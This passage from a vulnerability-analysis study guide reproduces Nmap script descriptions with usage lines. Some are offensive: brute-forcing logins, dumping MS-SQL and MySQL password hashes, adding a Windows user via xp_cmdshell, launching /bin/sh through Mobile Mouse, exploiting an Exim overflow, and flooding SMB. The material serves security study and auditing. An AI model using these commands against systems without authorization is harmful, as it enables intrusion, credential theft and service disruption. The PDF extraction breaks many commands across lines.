nmap

--script
llmnr-resolve
--script-args
resolve.hostname=examplename' -e wlan0

www.clubedohacker.com.br

'llmnr-

294

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Uses the Microsoft LLTD protocol to discover hosts on
a local network.
For more information on the LLTD protocol please refer to
http://www.microsoft.com/whdc/connect/Rally/LLTD-spec.mspx
@usage
nmap -e <interface> --script lltd-discovery

description = Retrieves version and database information from a SAP


Max DB database.
@usage
nmap -p 7210 --script maxdb-info <ip>

description = Performs brute force password auditing against


Couchbase Membase servers.
@usage
nmap -p 11211 --script membase-brute

description = Retrieves information (hostname, OS, uptime, etc.)


from the CouchBase Web Administration port.
@usage
nmap -p 8091 <ip> --script membase-http-info

www.clubedohacker.com.br

295

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Retrieves information (including system architecture,
process ID, and server time) from distributed memory
object caching system memcached.
@usage
nmap -p 11211 --script memcached-info

description = Gathers info from the Metasploit rpc service.


It requires a valid login pair. After authentication it
tries to determine Metasploit version and deduce the OS type.
Then it creates a new console and executes few commands
to get additional info.
References:http://wiki.msgpack.org/display/MSGPACK/Format+spe
cification
https://community.rapid7.com/docs/DOC-1516 Metasploit RPC API
Guide
@usage
nmap

<target>
--script=metasploit-info
username=root,password=root

--script-args

description = Performs brute force username and password auditing


against Metasploit msgrpc interface.

www.clubedohacker.com.br

296

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
@usage
nmap --script metasploit-msgrpc-brute -p 55553 <host>

description= Performs brute force password auditing against a


Metasploit RPC server using the XMLRPC protocol.
@usage
nmap --script metasploit-xmlrpc-brute -p 55553 <host>

description = Performs brute force password auditing against the


RPA Tech Mobile Mouse servers.
@usage
nmap --script mobilemouse-brute -p 51010 <host>

description = Connects to an RPA Tech Mobile Mouse server, starts


an application and sends a sequence of keys to it. Any
application that the user has access to can be started and
the key sequence is sent to the application after it has been
started.
@usage
nmap -p 51010 <host> --script mmouse-exec \
--script-args application='/bin/sh',keys='ping -c 5 127.0.0.1'

www.clubedohacker.com.br

297

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Enumerates SCADA Modbus slave ids (sids) and
collects their device information.
@usage
nmap

--script modbus-discover.nse --script-args='modbusdiscover.aggressive=true' -p 502 <host>

description = Performs brute force password auditing against the


MongoDB database.
@usage
nmap -p 27017 <ip> --script mongodb-brute

description = Attempts to get a list of tables from a MongoDB


database.
@usage
nmap -p 27017 --script mongodb-databases <host>

description = Attempts to get build info and server status from a


MongoDB database.
@usage
nmap -p 27017 --script mongodb-info <host>

www.clubedohacker.com.br

298

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Queries targets for multicast routing information.
@usage
nmap --script mrinfo
nmap --script mrinfo -e eth1
nmap --script mrinfo --script-args 'mrinfo.target=172.16.0.4'

description = Queries an MSRPC endpoint mapper for a list of


mapped services and displays the gathered information.
@usage nmap <target> --script=msrpc-enum

description = Performs password guessing against Microsoft SQL


Server (ms-sql). Works best in conjunction with the
<code>broadcast-ms-sql-discover</code> script.
@usage
nmap -p 445 --script ms-sql-brute --script-args mssql.instanceall,userdb=customuser.txt,passdb=custompass.txt
<host>
nmap

-p
1433
--script
ms-sql-brute
--script-args
userdb=customuser.txt,passdb=custompass.txt <host>

www.clubedohacker.com.br

299

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Queries Microsoft SQL Server (ms-sql) instances for a
list of databases, linked servers,
and configuration settings.
@usage
nmap

-p
1433
--script
ms-sql-config
--script-args
mssql.username=sa,mssql.password=sa <host>

description = Queries the Microsoft SQL Browser service for the


DAC (Dedicated Admin Connection) port of a given (or
all) SQL Server instance. The DAC port is used to
connect to the database instance when normal connection
attempts fail, for example, when server is hanging, out of
memory or in other bad states. In addition, the DAC port
provides an admin with access to system objects
otherwise not accessible over normal connections.
@usage
sudo nmap -sU -p 1434 --script ms-sql-dac <ip>

description = Dumps the password hashes from an MS-SQL server in


a format suitable for cracking by tools such as John-theripper. In order to do so the user needs to have the
appropriate DB privileges.
@usage
nmap -p 1433 <ip> --script ms-sql-dump-hashes

www.clubedohacker.com.br

300

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Attempts to authenticate to Microsoft SQL Servers
using an empty password for the sysadmin (sa) account.
@usage
nmap -p 445 --script ms-sql-empty-password --script-args
mssql.instance-all <host>
nmap -p 1433 --script ms-sql-empty-password <host>

description = Queries Microsoft SQL Server (ms-sql) instances for a


list of databases a user has access to.
@usage
nmap

-p

1433 --script ms-sql-hasdbaccess --script-args


mssql.username=sa,mssql.password=sa <host>

description = Attempts to determine configuration and version


information for Microsoft SQL Server instances.
@usage
nmap -p 445 --script ms-sql-info <host>
nmap -p 1433 --script ms-sql-info --script-args mssql.instanceport=1433 <host>

www.clubedohacker.com.br

301

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Runs a query against Microsoft SQL Server (ms-sql).
@usage
nmap

-p
1433
--script
ms-sql-query
--script-args
mssql.username=sa,mssql.password=sa,ms-sqlquery.query="SELECT * FROM master..syslogins"
<host>

description = Queries Microsoft SQL Server (ms-sql) for a list of


tables per database.
@usage
nmap

-p
1433
--script
ms-sql-tables
--script-args
mssql.username=sa,mssql.password=sa <host>

description = Attempts to run a command using the command shell of


Microsoft SQL Server (ms-sql).
@usage
nmap -p 445 --script ms-sql-discover,ms-sql-empty-password,mssql-xp-cmdshell <host>
-- nmap -p 1433 --script ms-sql-xp-cmdshell --script-args
mssql.username=sa,mssql.password=sa,ms-sql-xpcmdshell.cmd="net user test test /add" <host>

www.clubedohacker.com.br

302

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Audits MySQL database server security configuration
against parts of the CIS MySQL v1.0.2 benchmark (the
engine can be used for other MySQL audits by creating
appropriate audit files).
@usage
nmap -p 3306 --script mysql-audit --script-args "mysqlaudit.username='root', \
--mysql-audit.password='foobar',mysqlaudit.filename='nselib/data/mysql-cis.audit'"

description = Performs password guessing against MySQL.


@usage
nmap --script=mysql-brute <target>

description = Dumps the password hashes from an MySQL server in


a format suitable for cracking by tools such as John the
Ripper. Appropriate DB privileges (root) are required.
@usage
nmap -p 3306 <ip> --script mysql-dump-hashes --scriptargs='username=root,password=secret'

description = Runs a query against a MySQL database and returns the


results as a table.

www.clubedohacker.com.br

303

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
@usage
nmap

-p 3306 <ip> --script mysql-query --scriptargs='query="<query>"[,username=<username>,pass


word=<password>]'

description = Attempts to bypass authentication in MySQL and


MariaDB servers by exploiting CVE2012-2122. If its
vulnerable, it will also attempt to dump the MySQL
usernames and password hashes.
Original public advisory:
* http://seclists.org/oss-sec/2012/q2/493
Interesting post about this vuln:
https://community.rapid7.com/community/metasploit/blog/2012/06/1
1/cve-2012-2122-a-tragically-comedic-security-flaw-inmysql
@usage nmap -p3306 --script mysql-vuln-cve2012-2122 <target>
@usage nmap -sV --script mysql-vuln-cve2012-2122 <target>

description = Attempts to retrieve the target's NetBIOS names and


MAC address.
By default, the script displays the name of the computer and the
logged-in user; if the verbosity is turned up, it displays all
names the system thinks it owns.

www.clubedohacker.com.br

304

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
@usage
sudo nmap -sU --script nbstat.nse -p137 <host>
@usage
nmap -p 10000 --script ndmp-fs-info <ip>

description= Performs brute force password auditing against a Nessus


vulnerability scanning daemon using the NTP 1.2
protocol.
@usage
nmap --script nessus-brute -p 1241 <host>

description = Checks if a NetBus server is vulnerable to an


authentication bypass vulnerability which allows full
access without knowing the password.
@usage
nmap -p 12345 --script netbus-auth-bypass <target>

description = Performs brute force password auditing against the


Netbus backdoor ("remote administration") service.
@usage
nmap -p 12345 --script netbus-brute <target>

www.clubedohacker.com.br

305

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Opens a connection to a NetBus server and extracts
information about the host and the NetBus service itself.
@usage
nmap -p 12345 --script netbus-info <target> --script-args netbusinfo.password=<password>

description = Extends version detection to detect NetBuster, a


honeypot service that mimes NetBus.
@usage
nmap -sV -p 12345 --script netbus-version <target>

description= Performs brute force password auditing against a


Nexpose vulnerability scanner using the API 1.1. By
default it only tries three guesses per username to avoid
target account lockout.
@usage
nmap --script nexpose-brute -p 3780 <ip>

description = Performs brute force password auditing against an


Nping Echo service. See http://nmap.org/book/npingman-echo-mode.html for Echo Mode documentation.

www.clubedohacker.com.br

306

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
@usage
nmap -p 9929 --script nping-brute <target>

description = Queries Nagios Remote Plugin Executor (NRPE)


daemons to obtain information such as load averages,
process counts, logged in user information, etc.

@usage
nmap --script nrpe-enum -p 5666 <host>

description = Obtains and prints an NTP server's monitor data.


@usage
nmap -sU -pU:123 -Pn -n --script=ntp-monlist <target>

description = Performs brute force password auditing against the


OpenVAS manager using OMPv2.
@usage
nmap -p 9390 --script omp2-brute <target>

description = Attempts to retrieve the list of target systems and


networks from an OpenVAS Manager server.

www.clubedohacker.com.br

307

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
@usage
nmap -p 9390 --script omp2-brute,omp2-enum-targets <target>
@usage
nmap

-p

9390 --script omp2-enum-targets --script-args


omp2.username=admin,omp2.password=secret
<target>

description = Parses and displays the banner information of an


OpenLookup (network key-value store) server.
@usage
nmap -p 5850 --script openlookup-info <target>

description = Performs brute force password auditing against Oracle


servers.
@usage
nmap

--script oracle-brute -p 1521


brute.sid=ORCL <host>

--script-args

oracle-

description = Exploits the CVE-2012-3137 vulnerability, a weakness


in Oracle'sO5LOGIN authentication scheme
@usage

www.clubedohacker.com.br

308

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
nmap --script oracle-brute-stealth -p 1521 --script-args oraclebrute-stealth.sid=ORCL <host>

description = Attempts to enumerate valid Oracle user names against


unpatched Oracle 11g servers (this bug was fixed in
Oracle's October 2009 Critical Patch Update).
@usage
nmap --script oracle-enum-users --script-args oracle-enumusers.sid=ORCL,userdb=orausers.txt -p 1521-1560
<host>

description = Guesses Oracle instance/SID names against the TNSlistener.


@usage
nmap

--script=oracle-sid-brute
--scriptargs=oraclesids=/path/to/sidfile -p 1521-1560 <host>

nmap --script=oracle-sid-brute -p 1521-1560 <host>

description = Performs simple Path MTU Discovery to target hosts.


described in RFC 1191 and required by RFC 1812)
@usage
nmap --script path-mtu target

www.clubedohacker.com.br

309

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Performs brute force password auditing against the
pcAnywhere remote access protocol.
@usage
nmap --script=pcanywhere-brute <target>

description = Performs password guessing against PostgreSQL.


@usage
nmap -p 5432 --script pgsql-brute <host>

description = Retrieves or sets the ready message on printers that


support the Printer Job Language. This includes most
PostScript printers that listen on port 9100.
@usage
nmap --script=pjl-ready-message.nse \
--script-args='pjl_ready_message="your message here"'

description =
Repeatedly probe open and/or closed ports on a
host to obtain a series of round-trip time values for each
port.
See http://hcsw.org/nmap/QSCAN for more on Doug's research

www.clubedohacker.com.br

310

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
@usage
nmap

--script
qscan
--script-args
qscan.confidence=0.95,qscan.delay=200ms,qscan.numt
rips=10 target

description = Extracts information from a Quake3 game server and


other games which use the same protocol.
@usage
nmap -sU -sV -Pn --script quake3-info.nse -p <port> <target>

description = Determines which Security layer and Encryption level


is supported by the RDP service. It does so by cycling
through all existing protocols and ciphers. The script was
inspired
by
MWR's
RDP
Cipher
Checker
http://labs.mwrinfosecurity.com/tools/2009/01/12/rdpcipher-checker/
@usage
nmap -p 3389 --script rdp-enum-encryption <ip>

description = Checks if a machine is vulnerable to MS12-020 RDP


vulnerability. The Microsoft bulletin MS12-020 patches
two vulnerabilities: CVE-2012-0152 which addresses a
denial of service vulnerability inside Terminal Server, and
CVE-2012-0002 which fixes a vulnerability in Remote

www.clubedohacker.com.br

311

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Desktop Protocol. Both are part of Remote Desktop
Services.
References:
* http://technet.microsoft.com/en-us/security/bulletin/ms12-020
* http://support.microsoft.com/kb/2621440
* http://zerodayinitiative.com/advisories/ZDI-12-044/
* http://aluigi.org/adv/termdd_1-adv.txt
@usage
nmap -sV --script=rdp-ms12-020 -p 3389 <target>

description = Performs brute force passwords auditing against a Redis


key-value store.
@usage
nmap -p 6379 <ip> --script redis-brute

description = Retrieves information (such as version number and


architecture) from a Redis key-value store.
@usage
nmap -p 6379 <ip> --script redis-info

www.clubedohacker.com.br

312

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Resolves hostnames and adds every address (IPv4 or
IPv6, depending on Nmap mode) to Nmap's target list.
This differs from Nmap's normal host resolution process,
which only scans the first address (A or AAAA record)
returned for each host name.
@usage
nmap

--script=resolveall
--scriptargs=newtargets,resolveall.hosts={<host1>, ...} ...

-- @args resolveall.hosts Table of hosts to resolve

description = Creates a reverse index at the end of scan output


showing which hosts run a particular service. This is in
addition to Nmap's normal output listing the services on
each host.
@usage
nmap --script reverse-index <hosts/networks>

description= Performs brute force password auditing against the


classic UNIX rexec (remote exec) service.
@usage
nmap -p 512 --script rexec-brute <ip>

www.clubedohacker.com.br

313

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Retrieves information (such as node name and
architecture) from a Basho Riak distributed database
using the HTTP protocol.
@usage
nmap -p 8098 <ip> --script riak-http-info

description= Performs brute force password auditing against the


classic UNIX rlogin (remote login) service. This script
must be run in privileged mode on UNIX because it must
bind to a low source port number.
@usage
nmap -p 513 --script rlogin-brute <ip>

description = Connects to a remote RMI registry and attempts to


dump all of its objects.
@usage nmap --script "rmi-dumpregistry.nse" -p 1098 <host>

description = Tests whether Java rmiregistry allows class loading.


The default configuration of rmiregistry allows loading
classes from remote URLs, which can lead to remote code
execution. The vendor (Oracle/Sun)classifies this as a
design feature.

www.clubedohacker.com.br

314

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
References:
http://dev.metasploit.com/redmine/projects/framework/rep
ository/entry/modules/exploits/multi/misc/java_rmi_serve
r.rb
@usage
nmap --script=rmi-vuln-classloader -p 1099 <target>

description = Performs brute force password auditing against the


WinPcap Remote Capture Daemon (rpcap).
@usage
nmap -p 2002 <ip> --script rpcap-brute

description = Connects to the rpcap service (provides remote sniffing


capabilities through WinPcap) and retrieves interface
information. The service can either be setup to require
authentication or not and also supports IP restrictions.
@usage
nmap -p 2002 <ip> --script rpcap-info
nmap

-p
2002
<ip>
--script
rpcap-info
args="creds.rpcap='administrator:foobar

--script-

description = Fingerprints the target RPC port to extract the target


service, RPC number and version.

www.clubedohacker.com.br

315

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
@usage
nmap -sV <target>
nmap --script rpc-grind <target>
nmap --script rpc-grind --script-args 'rpc-grind.threads=8' -p
<targetport> -- <target>

description = Performs brute force password auditing against the


rsync remote file syncing protocol.
@usage
nmap

-p

873 --script rsync-brute


brute.module=www' <ip>

--script-args

'rsync-

description = Lists modules available for rsync (remote file sync)


synchronization.
@usage
nmap -p 873 --script rsync-list-modules <ip>

description = Determines which methods are supported by the RTSP


(real time streaming protocol) server.
@usage
nmap -p 554 --script rtsp-methods <ip>

www.clubedohacker.com.br

316

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Attempts to enumerate RTSP media URLS by testing
for common paths on devices such as surveillance IP
cameras.
@usage
nmap --script rtsp-url-brute -p 554 <ip>

description = Checks if target machines are vulnerable to the Samba


heap overflow vulnerability CVE-2012-1182.
References:
* https://bugzilla.samba.org/show_bug.cgi?id=8815
* http://www.samba.org/samba/security/CVE-2012-1182
@usage
nmap --script=samba-vuln-cve-2012-1182 -p 139 <target>

description = Performs brute force password auditing against Session


Initiation
Protocol
(SIP
http://en.wikipedia.org/wiki/Session_Initiation_Protocol)
accounts.
@usage
nmap -sU -p 5060 <target> --script=sip-brute

www.clubedohacker.com.br

317

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Spoofs a call to a SIP phone and detects the action
taken by the target (busy, declined, hung up, etc.)
nmap --script=sip-call-spoof -sU -p 5060 <targets>
nmap --script=sip-call-spoof -sU -p 5060 --script-args
'sip-call-spoof.ua=Nmap, sip-call-spoof.from=Boss' <targets>

description = Enumerates a SIP server's valid extensions (users).


@usage
nmap --script=sip-enum-users -sU -p 5060 <targets>

description = Enumerates a SIP Server's allowed methods (INVITE,


OPTIONS, SUBSCRIBE, etc.)
@usage
nmap --script=sip-methods -sU -p 5060 <targets>

description = Attempts to guess username/password combinations


over SMB, storing discovered combinations for use in
other scripts. Every attempt will be made to get a valid list
of users and to verify each username before actually using
them. When a username is discovered, besides being
printed, it is also saved in the Nmap registry so other
Nmap scripts can use it.

www.clubedohacker.com.br

318

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
@usage
nmap --script smb-brute.nse -p445 <host>
sudo nmap -sU -sS --script smb-brute.nse -p U:137,T:139 <host>

description = Checks for vulnerabilities:


* MS08-067, a Windows RPC vulnerability * Conficker, an infection
by the Conficker worm * Unnamed regsvc DoS, a denialof-service vulnerability I accidentally found in Windows
2000
* SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory
975497) * MS06-025, a Windows Ras RPC service
vulnerability
* MS07-029, a Windows Dns Server RPC service vulnerability
@usage
nmap --script smb-check-vulns.nse -p445 <host>
sudo nmap -sU -sS --script smb-check-vulns.nse -p U:137,T:139
<host>

description = Attempts to enumerate domains on a system, along with


their policies. This generally requires credentials, except
against Windows 2000. In addition to the actual domain,
the "Builtin" domain is generally displayed.

www.clubedohacker.com.br

319

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
@usage
nmap --script smb-enum-domains.nse -p445 <host>
sudo

nmap -sU -sS --script


U:137,T:139 <host>

smb-enum-domains.nse

-p

description = Obtains a list of groups from the remote Windows


system, as well as a list of the group's users.
@usage
nmap --script smb-enum-users.nse -p445 <host>
sudo nmap -sU -sS --script smb-enum-users.nse -p U:137,T:139
<host>

description = Pulls a list of processes from the remote server over


SMB. This will determine all running processes, their
process IDs, and their parent processes. It is done by
querying the remote registry service, which is disabled by
default on Vista;
on all other Windows versions, it requires Administrator privileges.
@usage
nmap --script smb-enum-processes.nse -p445 <host>
sudo

nmap -sU -sS --script


U:137,T:139 <host>

smb-enum-processes.nse

www.clubedohacker.com.br

-p

320

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Enumerates the users logged into a system either locally
or through an SMB share. The local users
can be logged on either physically on the machine, or through a
terminal services session.
@usage
nmap --script smb-enum-sessions.nse -p445 <host>
sudo nmap -sU -sS --script smb-enum-sessions.nse -p U:137,T:139
<host>

description

=
Attempts
to
list
shares
<code>srvsvc.NetShareEnumAll</code>
function and

using
the
MSRPC

retrieve

more
information
about
them
<code>srvsvc.NetShareGetInfo</code>.

using

@usage
nmap --script smb-enum-shares.nse -p445 <host>
sudo nmap -sU -sS --script smb-enum-shares.nse -p U:137,T:139
<host>

description = Exhausts a remote SMB server's connection limit by by


opening as many connections as we can.

www.clubedohacker.com.br

321

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
@usage
nmap --script smb-flood.nse -p445 <host>
sudo nmap -sU -sS --script smb-flood.nse -p U:137,T:139 <host>

description = Attempts to retrieve useful information about files


shared on SMB volumes.
The output is intended to resemble the output of the UNIX
<code>ls</code> command.
@usage
nmap

-p
445
<ip>
--script
'share=c$,path=\temp'

smb-ls

--script-args

description= Queries information managed by the Windows Master


Browser.
@usage
nmap -p 445 <host> --script smb-mbenum

description = Attempts to determine the operating system, computer


name, domain, workgroup, and current time over the
SMB
protocol
(ports
445
or
139).
http://www.skullsecurity.org/blog/?p=76.

www.clubedohacker.com.br

322

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
@usage
nmap --script smb-os-discovery.nse -p445 127.0.0.1
sudo nmap -sU -sS --script smb-os-discovery.nse -p U:137,T:139
127.0.0.1

description = Attempts to print text on a shared printer by calling


Print Spooler Service RPC functions.
In order to use the script, at least one printer needs to be shared over
SMB. If no printer is specified, script tries to enumerate
existing ones by calling LANMAN API which might not
be always available.
LANMAN is available by default on Windows XP, but not on Vista
or Windows 7
@usage nmap -p 445 <target> --script=smb-print-text --scriptargs="text=0wn3d"

description = Implements remote process execution similar to the


Sysinternals' psexec tool, allowing a user to run a series of
programs on a remote machine and read the output. This
is great for gathering information about servers, running the same
tool on a range of system, or even installing a backdoor
on a collection of computers.

www.clubedohacker.com.br

323

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
@usage
nmap

sudo

--script
smb-psexec.nse
--scriptargs=smbuser=<username>,smbpass=<password>[,co
nfig=<config>] -p445 <host>
nmap -sU -sS --script smb-psexec.nse --scriptargs=smbuser=<username>,smbpass=<password>[,co
nfig=<config>] -p U:137,T:139 <host>

description = Returns information about the SMB security level


determined by SMB.
@usage
nmap --script smb-security-mode.nse -p445 127.0.0.1
sudo nmap -sU -sS --script smb-security-mode.nse -p U:137,T:139
127.0.0.1

description = Attempts to grab the server's statistics over SMB and


MSRPC, which uses TCP ports 445 or 139.
An administrator account is required to pull these statistics on most
versions of Windows, and Vista and above require UAC
to be turned down.
@usage
nmap --script smb-server-stats.nse -p445 <host>

www.clubedohacker.com.br

324

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
sudo nmap -sU -sS --script smb-server-stats.nse -p U:137,T:139
<host>

description = Pulls back information about the remote system from


the registry. Getting all of the information requires an
administrative account, although a user account will still
get a lot of it. Guest probably won't get any, nor will
anonymous.
@usage
nmap --script smb-system-info.nse -p445 <host>
sudo nmap -sU -sS --script smb-system-info.nse -p U:137,T:139
<host>

description = Checks whether or not a server is running the SMBv2


protocol.
@usage
nmap --script smbv2-enabled.nse -p445 <host>
sudo nmap -sU -sS --script smbv2-enabled.nse -p U:137,T:139
<host>

description = Tests whether target machines are vulnerable to the


ms10-054 SMB remote memory corruption vulnerability.

www.clubedohacker.com.br

325

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
@usage nmap -p 445 <target> --script=smb-vuln-ms10-054 -script-args unsafe

description = Tests whether target machines are vulnerable to ms10061 Printer Spooler impersonation vulnerability.
References:
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE2010-2729 - http://technet.microsoft.com/enus/security/bulletin/MS10-061
- http://blogs.technet.com/b/srd/archive/2010/09/14/ms10061-printer-spooler-vulnerability.aspx
@usage nmap -p 445 <target> --script=smb-vuln-ms10-061

description = Performs brute force password auditing against SMTP


servers using either LOGIN, PLAIN, CRAM-MD5,
DIGEST-MD5 or NTLM authentication.
@usage
nmap -p 25 --script smtp-brute <host>

description = Attempts to use EHLO and HELP to gather the


Extended commands supported by anSM TP server.

www.clubedohacker.com.br

326

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
@usage
nmap

--script smtp-commands.nse [--script-args smtpcommands.domain=<domain>] -pT:25,465,587 <host>

description = Attempts to relay mail by issuing a predefined


combination of SMTP commands. The goal
of this script is to tell if a SMTP server is vulnerable to mail relaying.
@usage
nmap --script smtp-open-relay.nse [--script-args smtp-openrelay.domain=<domain>,smtp-openrelay.ip=<address>,...] -p 25,465,587 <host>

description = Checks for and/or exploits a heap overflow within


versions of Exim prior to version 4.69 (CVE-2010-4344)
and a privilege escalation vulnerability in Exim 4.72 and
prior (CVE-2010-4345).
Reference:
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-4344
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-4345
@usage
nmap

--script=smtp-vuln-cve2010-4344 --script-args="smtpvuln-cve2010-4344.exploit" -pT:25,465,587 <host>

www.clubedohacker.com.br

327

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
nmap

--script=smtp-vuln-cve2010-4344
--scriptargs="exploit.cmd='uname -a'" -pT:25,465,587 <host>

description = Checks for a memory corruption in the Postfix SMTP


server when it uses Cyrus SASL library authentication
mechanisms (CVE-2011-1720). This vulnerability can
allow denial of service and possibly remote code
execution.
Reference:
* http://www.postfix.org/CVE-2011-1720.html
@usage
nmap

--script=smtp-vuln-cve2011-1720
--scriptargs='smtp.domain=<domain>' -pT:25,465,587 <host>

description = Checks for a format string vulnerability in the Exim


SMTP server(version 4.70 through 4.75) with
DomainKeys Identified Mail (DKIM) support(CVE-20111764).
Reference:
* http://bugs.exim.org/show_bug.cgi?id=1106
* http://thread.gmane.org/gmane.mail.exim.devel/4946
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=2011-1764
* http://en.wikipedia.org/wiki/DomainKeys_Identified_Mail

www.clubedohacker.com.br

328

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
@usage
nmap --script=smtp-vuln-cve2011-1764 -pT:25,465,587 <host>

description = Attempts to find an SNMP community string by brute


force guessing.
@usage
nmap -sU --script snmp-brute <target> [--script-args snmpbrute.communitiesdb=<wordlist>
@args snmp-brute.communitiesdb The filename of a list of
community strings to try.

description = Attempts to downloads Cisco router IOS configuration


files using SNMP RW (v1) and display or save them.
@usage
nmap

-sU -p 161 --script snmp-ios-config --script-args


snmpcommunity=<community> <target>

description = Attempts to extract system information from an SNMP


version 1 service.
@usage
nmap -sU -p 161 --script snmp-sysdescr <target>

www.clubedohacker.com.br

329

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Determines the supported authentication mechanisms of
a remote SOCKS proxy server. Starting with SOCKS
version 5 socks servers may support authentication.
@usage
nmap -p 1080 <ip> --script socks-auth-info

description = Performs brute force password auditing against SOCKS


5 proxy servers.
@usage
nmap --script socks-brute -p 1080 <host>

description= Checks if an open socks proxy is running on the target.


@usage
nmap --script=socks-open-proxy \
--script-args proxy.url=<host>,proxy.pattern=<pattern>

description = Reports the number of algorithms (for encryption,


compression, etc.) that the target SSH2 server offers. If
verbosity is set, the offered algorithms are each listed by
type.

www.clubedohacker.com.br

330

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
@usage
nmap --script ssh2-enum-algos target

description = Shows SSH hostkeys.


Shows the target SSH server's key fingerprint and (with high enough
verbosity level) the public key itself. It records the
discovered host keys in <code>nmap.registry</code> for
use by other scripts. Output can be controlled with the
<code>ssh_hostkey</code> script argument.
@usage
nmap host --script SSH-hostkey --script-args ssh_hostkey=full
nmap host --script SSH-hostkey --script-args ssh_hostkey=all
nmap host --script SSH-hostkey --script-args ssh_hostkey='visual
bubble

description = Retrieves a target host's time and date from its TLS
ServerHello response.

@usage
nmap <target> --script=ssl-date

www.clubedohacker.com.br

331

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = This script repeatedly initiates SSL/TLS connections,
each time trying a new cipher or compressor while
recording whether a host accepts or rejects it. The end
result is a list of all the ciphers and compressors that a
server accepts.
@usage
nmap --script ssl-enum-ciphers -p 443 <host>

description = Queries Google's Certificate Catalog for the SSL


certificates retrieved from target hosts.
@usage
nmap -p 443 --script ssl-cert,ssl-google-cert-catalog <host>

description = Checks whether the SSL certificate used by a host has a


fingerprint that matches an included database of
problematic keys.
@usage
nmap --script ssl-known-key -p 443 <host>

description = Retrieves the external IP address of a NAT:ed host


using the STUN protocol.

www.clubedohacker.com.br

332

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
@usage
nmap -sV -PN -sU -p 3478 --script stun-info <ip>

description = Detects whether a host is infected with the Stuxnet


worm (http://en.wikipedia.org/wiki/Stuxnet).
An executable version of the Stuxnet infection will be downloaded if
a format for the filename is given on the command line.
@usage
nmap --script stuxnet-detect -p 445 <host>

description = Performs brute force password auditing against


Subversion source code control servers.
@usage
nmap --script svn-brute --script-args svn-brute.repo=/svn/ -p
3690 <host>

description = Produces a list of IP prefixes for a given routing AS


number (ASN).
http://www.shadowserver.org/wiki/pmwiki.php/Services/IP-BGP
@usage
nmap --script targets-asn --script-args targets-asn.asn=32

www.clubedohacker.com.br

333

ADONEL BEZERRA
